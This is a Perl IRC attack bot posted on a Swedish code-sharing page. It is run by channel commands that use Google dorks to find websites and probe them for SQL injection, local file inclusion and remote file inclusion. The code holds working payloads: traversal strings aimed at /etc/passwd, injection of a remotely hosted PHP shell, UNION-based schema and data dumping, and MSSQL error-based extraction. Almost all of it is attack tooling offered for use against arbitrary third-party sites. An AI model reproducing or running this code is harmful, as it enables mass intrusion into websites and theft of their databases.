IRC Scanner Multi Vuln/decrypters/searchExploits

Skapad 3 år sedan, skriven i Perl, med 249 visningar.
URL http://kod.perl.se/view/bd9920b5 Bädda in
Ladda hem koden eller visa koden i råformatVisa bredare version
  1. #!/usr/bin/perl
  2. #
  3. # OOO OOO OO OO OO
  4. # OO O O O O
  5. # O O O OO OO O O O O OO OOO OOOO OOOOO
  6. # O O O O O O O OOO OO OOOOOO O
  7. # O OO O O O O O O O O OOOOOO
  8. # OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO
  9. ################################################################################
  10. ################################################
  11. # IRC BOT V1.5 beta
  12. ################################################################################
  13. ################################################
  14. # [+] What's New in this version ?
  15. # 1/ RFI Vulnerable Scanner
  16. # 2/ LFI Vulnerable Scanner
  17. # 3/ an msg when scan finish
  18. # 4/ msg appear once banned from google search
  19. ################################################################################
  20. ################################################
  21. # ------------ You Must Change BOT Config First Of ALL
  22. # ------------ Bot Commands :
  23. #-- !md5 <word> => make an md5 hash
  24. #-- !md5crack <hash> => crack md5 hashes
  25. #-- !base64 <word> => encode with base64
  26. #-- !basedecode <text to decode> => decode base64 text
  27. #-- !lastsploits => to get lastest sploits from milw0rm
  28. #-------------------------------------{ SQL INJECTION FUNCTIONS }-----------------------------------------
  29. #-- !col <vuln> => calculate number of columns in a sql vulnerable
  30. #-- !det <vuln> * => MySQL DB Details (version , user ,db , dir )
  31. #-- !schema <vuln> * => Extract all (DB's , Tables , Columns) names
  32. #-- !dump <vuln> * => Dump Data from a column & table
  33. #-- !ms <vuln> => Get MsSQL DB Details
  34. # ===>>> * you must enter vuln this way http://target.com/page.php?id=0+union+select+1,nullarea,2,3
  35. #-------------------------------------{ Vulnerability scan FUNCTIONS }-----------------------------------------
  36. #-- !sqlscan <dork> => fetch url's from google and check if sql vuln or not
  37. #-- !rfiscan <dork> => fetch url's from google and check if rfi vuln or not
  38. #-- !lfiscan <dork> => fetch url's from google and check if lfi vuln or not
  39. ################################################################################
  40. ################################################
  41. # [+] Contact : www.facebook.com/pqpigor
  42. ################################################################################
  43. ################################################
  44. # c99 shell relocated
  45. ################################################################################
  46. ################################################
  47.  
  48.  
  49. use IO::Socket::INET;
  50. use LWP::UserAgent;
  51. use LWP::Simple;
  52. use XML::Simple;
  53. use Digest::MD5 qw(md5_hex);
  54. use MIME::Base64;
  55. ################################################################################
  56. ############
  57. my $server = "SERVER IP"; # IRC Server
  58. my $port = "6667"; # IRC Server port
  59. my $nick = "Bot"; # Bot Nick
  60. my $channel = "#channel"; # Channel to Join
  61. my $ident = "NICK";
  62. my $realname = "nickName";
  63. my $name = "bot";
  64. my $phpshell = "http://fikretibrahimi.d1s.org/jancok.txt????"; #your phpshell link for RFI scan relinked by deviance^
  65. ################################################################################
  66. ############
  67. system('cls');
  68. print "\n\n\n\n OOO OOO OO OO OO\n";
  69. print " OO O O O O\n";
  70. print " O O O OO OO O O O O OO OOO OOOO OOOOO\n";
  71. print " O O O O O O O OOO OO OOOOOO O\n";
  72. print " O OO O O O O O O O O OOOOOO\n";
  73. print " OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO\n";
  74. print " \n\n AlpHaNiX IRC BOT V1 Deviance^ \n\n";
  75. print "\n [+] Connection To $server ....\n";
  76. ################################################################################
  77. ############
  78. $connection = IO::Socket::INET->new(PeerAddr=>"$server",
  79. PeerPort=>"$port",
  80. Proto=>'tcp',
  81. Timeout=>'30') or die " [!] Couldnt Connect To $server\n";
  82. print " [+] Connected To $server ....\n\n";
  83. ################################################################################
  84. ############
  85. print $connection "USER $ident 8 * :Devike\r\n";
  86. print $connection "NICK $ident $server $realname\r\n";
  87. ################################################################################
  88. ############
  89. while($response = <$connection>)
  90. {
  91. print $response; #print IRC Response
  92. if($response =~ m/:(.*) 00(.*) (.*) :/){print $connection "JOIN $channel\r\n";} #-------Join Channel
  93. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!help/){&help;} #-------Print Help
  94. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!md5 (.*)$/){&md5encode;} #------- md5encoder
  95. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!md5crack (.*)$/){&md5cracker;} #-------md5cracker
  96. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!base64 (.*)$/){&base64;} #-------base64 encoder
  97. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!basedecode (.*)$/){&basedecode;}#-------base64decoder
  98. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!iplocation (.*)$/){&iplocation;}#-------ip locator
  99. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!lastsploits/){&milw0rm;} #-------last sploits
  100. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!sqlscan (.*)$/){&sqlscan;} #-------SQLi scanner
  101. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!lfiscan (.*)$/){&lfiscan;} #-------LFI Scanner
  102. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!rfiscan (.*)$/){&rfiscan;} #-------RFI Scanner
  103. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!col (.*)$/){&colcount;} #-------column counter
  104. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!det (.*)$/){&mysqldet;} #-------details grabber
  105. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!schema (.*)$/){&schema;} #-------schema extractor
  106. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!dump (.*)-(.*)-(.*)$/){&mysqldumper}#-------data dumper
  107. if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!ms (.*)$/){&mssqldet} #-------mssql details grabber
  108. if($response =~ m/^PING (.*?)$/gi){print $connection "PONG ".$1."\r\n";} #-------ping reponse
  109. }
  110. ################################################################################
  111. ############
  112. sub help
  113. {
  114. print $connection "PRIVMSG $channel :8,1 IRC BOT FIXING DEVIANCE: \r\n";
  115. print $connection "PRIVMSG $channel :8,1 \r\n";
  116. print $connection "PRIVMSG $channel :4,1 --------------== Encoding Services ==--------------\r\n";
  117. print $connection "PRIVMSG $channel :9,1 MD5 Encrypt => : 11,1 !md5 word \r\n";
  118. print $connection "PRIVMSG $channel :9,1 MD5 Decrypt (fix it !) => : 11,1 !md5crack Hash \r\n";
  119. print $connection "PRIVMSG $channel :9,1 Base64 Encrypt => : 11,1 !base64 word \r\n";
  120. print $connection "PRIVMSG $channel :9,1 Base64 Decrypt => : 11,1 !basedecode base64 \r\n";
  121. print $connection "PRIVMSG $channel :4,1 ----------------== Other Services ==---------------\r\n";
  122. print $connection "PRIVMSG $channel :9,1 IP loc. (fix it !) => : 11,1 !iplocation ip \r\n";
  123. print $connection "PRIVMSG $channel :9,1 Sploits => : 11,1 !lastsploits \r\n";
  124. print $connection "PRIVMSG $channel :4,1 ----------------== SQL Injection ==----------------\r\n";
  125. print $connection "PRIVMSG $channel :9,1 MySQL Column Count => : 11,1 !col target \r\n";
  126. print $connection "PRIVMSG $channel :9,1 MySQL DB Info => : 11,1 !det target \r\n";
  127. print $connection "PRIVMSG $channel :9,1 MySQL Schema Ext. => : 11,1 !schema target \r\n";
  128. print $connection "PRIVMSG $channel :9,1 MySQL Dumper => : 11,1 !dump target \r\n";
  129. print $connection "PRIVMSG $channel :9,1 MsSQL Info => : 11,1 !ms target \r\n";
  130. print $connection "PRIVMSG $channel :4,1 ------------== Vulnerablitys Scanner ==------------\r\n";
  131. print $connection "PRIVMSG $channel :9,1 SQL Vuln Scan => : 11,1 !sqlscan dork \r\n";
  132. print $connection "PRIVMSG $channel :9,1 LFI Vuln Scan => : 11,1 !lfiscan dork \r\n";
  133. print $connection "PRIVMSG $channel :9,1 RFI Vuln Scan => : 11,1 !rfiscan dork \r\n";
  134. }
  135. ################################################################################
  136. ############
  137. sub md5encode
  138. {
  139. my $md5_hash = $3;
  140. my $asker = $1;
  141. my $md5_generated = md5_hex($md5_hash);
  142. print $connection "PRIVMSG $channel :4$asker , done =>6 $md5_generated\r\n";
  143. }
  144. ################################################################################
  145. ############
  146. sub md5cracker
  147. {
  148. my $asker = $1;
  149. my $hash = $3;
  150. if (length($hash) != 33)
  151. {
  152. print $connection "PRIVMSG $channel :Not Valid MD5 Hash !\r\n";
  153. }
  154. else
  155. {
  156. my $ua = LWP::UserAgent->new();
  157. my $contents = $ua->get('http://md5.rednoize.com/?p&s=md5&q='.$hash);
  158. my $cracked = $contents->content;
  159. if ($cracked)
  160. {
  161. print $connection "PRIVMSG $channel :4$asker Cracked ! =>6 $cracked\r\n";
  162. }
  163. else
  164. {
  165. print $connection "PRIVMSG $channel :4$asker,6 Not Found !\r\n";
  166. }
  167. }
  168. }
  169. ################################################################################
  170. ############
  171. sub base64
  172. {
  173. my $base64 = $3;
  174. my $asker = $1;
  175. my $base64_encoded = encode_base64($base64);
  176. print $connection "PRIVMSG $channel :4$asker,6 Encoded => $base64_encoded\r\n";
  177. }
  178. ################################################################################
  179. ############
  180. sub basedecode
  181. {
  182. my $base64d = $3;
  183. my $asker = $1;
  184. my $base64_decoded = decode_base64($base64d);
  185. print $connection "PRIVMSG $channel :4$asker,6 Decoded => $base64_decoded\r\n";
  186. }
  187. ################################################################################
  188. ############
  189. sub iplocation
  190. {
  191.  
  192. my $asker = $1;
  193. my $ip = $3;
  194. if (length($ip) > 17)
  195. {
  196. print $connection "PRIVMSG $channel :6Not Real IP !\r\n";
  197. }
  198. else
  199. {
  200. my $ua = LWP::UserAgent->new();
  201. my $contents = $ua->get('http://www.melissadata.com/lookups/iplocation.asp?ipaddress='.$ip);
  202. my $found = $contents->content;
  203. if ($found =~ /<tr><td align="right">Country<\/td><td><b>(.*)<\/b><\/td><\/tr>/)
  204. {
  205. print $connection "PRIVMSG $channel :4$asker , The IP Location =>6 $1\r\n";
  206. }
  207. else
  208. {
  209. print $connection "PRIVMSG $channel :6Not Real IP !\r\n";
  210. }
  211. }
  212.  
  213. }
  214. ################################################################################
  215. ############
  216. sub milw0rm
  217. {
  218. my $rss = get('http://milw0rm.com/rss.php');
  219. my $xml = XMLin($rss);
  220. my $spl = scalar(@{$xml->{channel}->{item}});
  221. for ($i=0; $i<$spl; $i++)
  222. {
  223. print $connection "PRIVMSG $channel :4\n";
  224. print $connection "PRIVMSG $channel :6Date : $xml->{channel}->{item}->[$i]->{pubDate}\n";
  225. print $connection "PRIVMSG $channel :6Title: $xml->{channel}->{item}->[$i]->{title}\n";
  226. print $connection "PRIVMSG $channel :6Link : $xml->{channel}->{item}->[$i]->{link}\n\n";
  227. }
  228. }
  229. ################################################################################
  230. ############
  231. sub sqlscan
  232. {
  233. my $asker = $1;
  234. my $dork = $3;
  235. print $connection "PRIVMSG $channel :4$asker 12[+] SQL Vulnerable Scan Started ....\r\n";
  236. print $connection "PRIVMSG $channel :4$asker 12[+] Dork : $dork ....\r\n";
  237. my $google = "http://www.google.com/search?hl=en&q=$dork&btnG=Search&start=";
  238. #----
  239. my $request = HTTP::Request->new(GET=>"$google"."$i");
  240. my $useragent = LWP::UserAgent->new(agent => 'Firefox 3.0.9');
  241. my $response = $useragent->request($request);
  242. my $con = $response->content;
  243. if ($con =~ m/restore your access as quickly as possible, so try again soon. In the meantime, if you suspect that your computer or network has been infected/i)
  244. { print $connection "PRIVMSG $channel :4$asker 12[!] Banned From Google Search !!\r\n"; }
  245. else
  246. {
  247. for ($i=0;$i<200;$i=$i+10)
  248. {
  249. my $request = HTTP::Request->new(GET=>"$google"."$i");
  250. my $useragent = LWP::UserAgent->new(agent => 'Mozilla 5.2');
  251. my $response = $useragent->request($request);
  252. my $con = $response->content;
  253. my $start='class=r><a href=\"';
  254. my $end= '" class=l>';
  255. while ( $con =~ m/$start(.*?)$end/g )
  256. {
  257. my $fl = $1;
  258. my $link = $fl.'0+order+by+9999999--';
  259. print $connection "PRIVMSG $channel :4$asker 12[!] Trying To Fuzz6 $1\r\n";
  260. my $ua = LWP::UserAgent->new();
  261. my $req = $ua->get($link);
  262. my $result = $req->content;
  263. if ($result=~ m/You have an error in your SQL syntax/i || $result=~ m/Query failed/i || $result=~ m/SQL query failed/i || $result=~ m/mysql_fetch_/i || $result=~ m/mysql_fetch_array/i || $result =~ m/mysql_num_rows/i || $result =~ m/The used SELECT statements have a different number of columns/i )
  264. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible MySQL Vulnerable Website ->6 $fl\r\n";}
  265. elsif ($result=~ m/ODBC SQL Server Driver/i || $result=~ m/Unclosed quotation mark/i || $result=~ m/Microsoft OLE DB Provider for/i )
  266. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible MsSQL Vulnerable Website ->6 $fl\r\n";}
  267. elsif ($result=~ m/Microsoft JET Database/i || $result=~ m/ODBC Microsoft Access Driver/i )
  268. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible MS Access Vulnerable Website ->6 $fl\r\n";}
  269. }
  270. }
  271. print $connection "PRIVMSG $channel :4$asker 12[!] SQL Scan Finished !\r\n";
  272. }
  273. }
  274. ################################################################################
  275. ############
  276. sub lfiscan
  277. {
  278. my $asker = $1;
  279. my $dork = $3;
  280. print $connection "PRIVMSG $channel :4$asker 12[+] LFI Vulnerable Scan Started ....\r\n";
  281. print $connection "PRIVMSG $channel :4$asker 12[+] Dork : $dork ....\r\n";
  282. my $google = "http://www.google.com/search?hl=en&q=$dork&btnG=Search&start=";
  283. @LFI = ('../etc/passwd',
  284. '../../etc/passwd',
  285. '../../../etc/passwd',
  286. '../../../../etc/passwd',
  287. '../../../../../etc/passwd',
  288. '../../../../../../etc/passwd',
  289. '../../../../../../../etc/passwd',
  290. '../../../../../../../../etc/passwd',
  291. '../../../../../../../../../etc/passwd',
  292. '../../../../../../../../../../etc/passwd',
  293. '../../../../../../../../../../../etc/passwd',
  294. '../../../../../../../../../../../../etc/passwd',
  295. '../../../../../../../../../../../../../etc/passwd',
  296. '../../../../../../../../../../../../../../etc/passwd',);
  297. my $request = HTTP::Request->new(GET=>"$google"."$i");
  298. my $useragent = LWP::UserAgent->new(agent => 'Mozilla 5.2');
  299. my $response = $useragent->request($request);
  300. my $con = $response->content;
  301. if ($con =~ m/restore your access as quickly as possible, so try again soon. In the meantime, if you suspect that your computer or network has been infected/i)
  302. { print $connection "PRIVMSG $channel :4$asker 12[!] Banned From Google Search !!\r\n"; }
  303. else
  304. {
  305. for ($i=0;$i<200;$i=$i+10)
  306. {
  307. my $start='class=r><a href=\"';
  308. my $end= '" class=l>';
  309. while ( $con =~ m/$start(.*?)$end/g )
  310. {
  311. print $connection "PRIVMSG $channel :4$asker 12[!] Trying To Fuzz6 $1\r\n";
  312. for ($j;$j<=14;$j++)
  313. {
  314. my $fl = $1;
  315. my $link = $fl.$LFI[$j];
  316. my $ua = LWP::UserAgent->new();
  317. my $req = $ua->get($link);
  318. my $result = $req->content;
  319. if ($result=~ m/root:x:/i)
  320. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible LFI Vulnerable Website ->6 $fl\r\n";}
  321. }
  322. }
  323. }
  324. print $connection "PRIVMSG $channel :4$asker 12[!] LFI Scan Finished !\r\n";
  325. }
  326. }
  327. ################################################################################
  328. ############
  329. sub rfiscan
  330. {
  331. my $asker = $1;
  332. my $dork = $3;
  333. print $connection "PRIVMSG $channel :4$asker 12[+] RFI Vulnerable Scan Started ....\r\n";
  334. print $connection "PRIVMSG $channel :4$asker 12[+] Dork : $dork ....\r\n";
  335. my $google = "http://www.google.com/search?hl=en&q=$dork&btnG=Search&start=";
  336. #----
  337. my $request = HTTP::Request->new(GET=>"$google"."$i");
  338. my $useragent = LWP::UserAgent->new(agent => 'Mozilla 5.2');
  339. my $response = $useragent->request($request);
  340. my $con = $response->content;
  341. if ($con =~ m/restore your access as quickly as possible, so try again soon. In the meantime, if you suspect that your computer or network has been infected/i)
  342. { print $connection "PRIVMSG $channel :4$asker 12[!] Banned From Google Search !!\r\n"; }
  343. else
  344. {
  345. for ($i=0;$i<200;$i=$i+10)
  346. {
  347. my $start='class=r><a href=\"';
  348. my $end= '" class=l>';
  349. while ( $con =~ m/$start(.*?)$end/g )
  350. {
  351. print $connection "PRIVMSG $channel :4$asker 12[!] Trying To Fuzz6 $1\r\n";
  352. my $fl = $1;
  353. my $link = $fl.$phpshell.'??';
  354. my $ua = LWP::UserAgent->new();
  355. my $req = $ua->get($link);
  356. my $result = $req->content;
  357. if ($result=~ m/uid=/i)
  358. {print $connection "PRIVMSG $channel :4$asker 12[!] Possible RFI Vulnerable Website ->6 $fl\r\n";}
  359. }
  360. }
  361. print $connection "PRIVMSG $channel :4$asker 12[!] RFI Scan Finished !\r\n";
  362. }
  363. }
  364. ################################################################################
  365. ############
  366. sub colcount
  367. {
  368. my $asker = $1;
  369. print $connection "PRIVMSG $channel :4$asker 12[+] Column Counting Started , Please Wait ....\r\n";
  370. my $site = $3;
  371. my $null = "09+and+1=";
  372. my $code = "0+union+select+";
  373. my $add = "+";
  374. my $com = "--";
  375. my $injection = $site.$null.$code."0",$com;
  376. my $request = HTTP::Request->new(GET=>$injection);
  377. my $useragent = LWP::UserAgent->new();
  378. my $response = $useragent->request($request);
  379. my $result = $response->content;
  380. if( $result =~ /You have an error in your SQL syntax/ || $result=~/Query failed/ || $result=~/SQL query failed/ || $result=~ /mysql_fetch_/ || $result=~ /mysql_fetch_array/ || $result =~ /mysql_num_rows/ || $result =~ /The used SELECT statements have a different number of columns/)
  381. {
  382. print $connection "PRIVMSG $channel :4$asker 12[+] This Website Is Vulnerable\n";
  383. print $connection "PRIVMSG $channel :4$asker 12[+] Working On It\n";
  384. }
  385. else
  386. {
  387. print $connection "PRIVMSG $channel :4$asker 10[!] This WebSite Is Not SQL Vulnerable !\n\n";
  388. }
  389. for ($i = 0; $i < 50; $i ++)
  390. {
  391. $col.=','.$i;
  392. $specialword.=','."0x617a38387069783030713938";
  393. if ($i == 0)
  394. {
  395. $specialword = '';
  396. $col = '';
  397. }
  398. $sql=$site.$null.$code."0x617a38387069783030713938".$specialword.$com;
  399. my $ua = LWP::UserAgent->new();
  400. my $res = $ua->get($sql);
  401. $response=$res->content;
  402. if($response =~ /az88pix00q98/)
  403. {
  404. $i ++;
  405. print $connection "PRIVMSG $channel :4$asker 12[+] This Injection Have6 $i 12Columns\n";
  406. }
  407. }
  408. }
  409. ################################################################################
  410. ############
  411. sub mysqldet
  412. {
  413. my $asker = $1;
  414. my $site = $3;
  415. my $selection = "concat(0x617a38387069783030713938,version(),0x617a38387069783030713938,database(),0x617a38387069783030713938,user(),0x617a38387069783030713938,\@\@datadir,0x617a38387069783030713938)";
  416. print $connection "PRIVMSG $channel :4$asker 12[+] Info Getting, Started Please Wait ....\r\n";
  417. if ($site =~ /(.*)NullArea(.*)/i)
  418. {
  419. $newlink = $1.$selection.$2.'--';
  420. my $ua = LWP::UserAgent->new();
  421. my $request = $ua->get($newlink);
  422. my $content = $request->content;
  423. if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
  424. {
  425. print $connection "PRIVMSG $channel :4$asker 12[+] Database Version :6 $1\r\n";
  426. print $connection "PRIVMSG $channel :4$asker 12[+] Database Name :6 $2\r\n";
  427. print $connection "PRIVMSG $channel :4$asker 12[+] DB UserName :6 $3\r\n";
  428. print $connection "PRIVMSG $channel :4$asker 12[+] Databse Dir :6 $4\r\n";
  429. }
  430. else
  431. {
  432. print $connection "PRIVMSG $channel :4$asker 12[!] Failed\r\n";
  433. }
  434. }
  435. else
  436. {
  437. print $connection "PRIVMSG $channel :4$asker 12[!] Please Enter the target this way :6 http://target.net/page.php?id=0+union+select+1,2,nullarea,3\r\n";
  438. }
  439. }
  440. ################################################################################
  441. ############
  442. sub schema
  443. {
  444. my $asker = $1;
  445. my $site = $3;
  446. my $selection = "concat(0x617a38387069783030713938,table_name,0x617a38387069783030713938,column_name
  447. ,0x617a38387069783030713938,table_schema,0x617a38387069783030713938)";
  448. if ($site =~ /(.*)NullArea(.*)/i)
  449. {
  450. print $connection "PRIVMSG $channel :4$asker 12[+] 6Table 12:|: 6Column 12:|: 6Database\r\n";
  451. for ($i ; $i<=1500; $i++ )
  452. {
  453. $newstring = $1.$selection.$2.'+'.'from'.'+'.'information_schema.columns'.'+'.'LIMIT'.'+'.$i.','.'1'.'--';
  454. my $ua = LWP::UserAgent->new();
  455. my $request = $ua->get($newstring);
  456. my $content = $request->content;
  457. if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
  458. {
  459. print $connection "PRIVMSG $channel :4$asker 12[!] 6$1 12:|: 6$2 12:|: 6$3 \r\n";
  460. }
  461. }
  462. }
  463. else
  464. {
  465. print $connection "PRIVMSG $channel :4$asker 12[!] Please Enter the target this way :6 http://target.net/page.php?id=0+union+select+1,2,nullarea,3\r\n";
  466. }
  467. }
  468. ################################################################################
  469. ############
  470. sub mysqldumper
  471. {
  472. my $asker = $1;
  473. my $site = $3;
  474. my $table = $5;
  475. my $selection = "concat(0x617a38387069783030713938,$4,0x617a38387069783030713938)";
  476. if ($site =~ /(.*)NullArea(.*)/i)
  477. {
  478. print $connection "PRIVMSG $channel :4$asker 12[+] 6 DATA\r\n";
  479. for ($i ; $i<=1500; $i++ )
  480. {
  481. $newstring = $1.$selection.$2.'+'.'from'.'+'.$table.'+'.'LIMIT'.'+'.$i.','.'1'.'--';
  482. my $ua = LWP::UserAgent->new();
  483. my $request = $ua->get($newstring);
  484. my $content = $request->content;
  485. if ($content =~ /az88pix00q98(.*)az88pix00q98/)
  486. {
  487. print $connection "PRIVMSG $channel :4$asker 12[!] 6 $1\r\n";
  488. }
  489. }
  490. }
  491. else
  492. {
  493. print $connection "PRIVMSG $channel :4$asker 12[!] Please Enter the target this way :6 http://target.net/page.php?id=0+union+select+1,2,nullarea,3-column_name-table_name\r\n";
  494. }
  495. }
  496. ################################################################################
  497. ############
  498. sub mssqldet
  499. {
  500. my $asker = $1;
  501. print $connection "PRIVMSG $channel :4$asker 12[+] Getting Infos Started , Please Wait ....\r\n";
  502. my $target = $3;
  503. print "\n[+] Working On $target";
  504. my $version = 'convert(int,(select+@@version));--';
  505. my $system_user = 'convert(int,(select+system_user));--';
  506. my $db_name = 'convert(int,(select+db_name()));--';
  507. my $servername = 'convert(int,(select+@@servername));--';
  508. my $hostname = 'convert(int,(select+Host_Name()));--';
  509. my $site = $target;
  510. my $injection = $site.$version;
  511. my $request = HTTP::Request->new(GET=>$injection);
  512. my $useragent = LWP::UserAgent->new();
  513. my $response = $useragent->request($request)->as_string;
  514. if ($response =~ /.*?value\s'/)
  515. {
  516. print $connection "PRIVMSG $channel :4$asker 12[+] This Website Is SQL Vulnerable ..\r\n";
  517. print $connection "PRIVMSG $channel :4$asker 12[+] Working On It ..\r\n";
  518.  
  519. $ver = $1 if ($response =~ /.*?value\s'(.*?)'\sto.*/sm);
  520.  
  521. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL Version Is : 6$ver\r\n";
  522.  
  523. my $injection = $site.$system_user;
  524. my $request = HTTP::Request->new(GET=>$injection);
  525. my $useragent = LWP::UserAgent->new();
  526. $useragent->timeout(10);
  527. my $response = $useragent->request($request)->as_string;
  528. $system_user = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  529. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL System_User Is : 6$system_user\r\n";
  530.  
  531. my $injection = $site.$db_name;
  532. my $request = HTTP::Request->new(GET=>$injection);
  533. my $useragent = LWP::UserAgent->new();
  534. $useragent->timeout(10);
  535. my $response = $useragent->request($request)->as_string;
  536. $db_name = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  537. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL Database Name Is : 6$db_name\r\n";
  538.  
  539. my $injection = $site.$servername;
  540. my $request = HTTP::Request->new(GET=>$injection);
  541. my $useragent = LWP::UserAgent->new();
  542. $useragent->timeout(10);
  543. my $response = $useragent->request($request)->as_string;
  544. $servername = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  545. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL Server Name Is : 6$servername\r\n";
  546.  
  547. my $injection = $site.$hostname;
  548. my $request = HTTP::Request->new(GET=>$injection);
  549. my $useragent = LWP::UserAgent->new();
  550. $useragent->timeout(10);
  551. my $response = $useragent->request($request)->as_string;
  552. $hostnames = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  553. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL HostName Is : 6$hostnames\r\n";
  554. }
  555. else
  556. {
  557. print $connection "PRIVMSG $channel :4$asker 10[!] This Website Is Not SQL Vulnerable !\r\n";
  558. }
  559. }
  560. ################################################################################
  561. ############

Svara på "IRC Scanner Multi Vuln/decrypters/searchExploits"

Här kan du skriva ett svar till kodsnutten ovan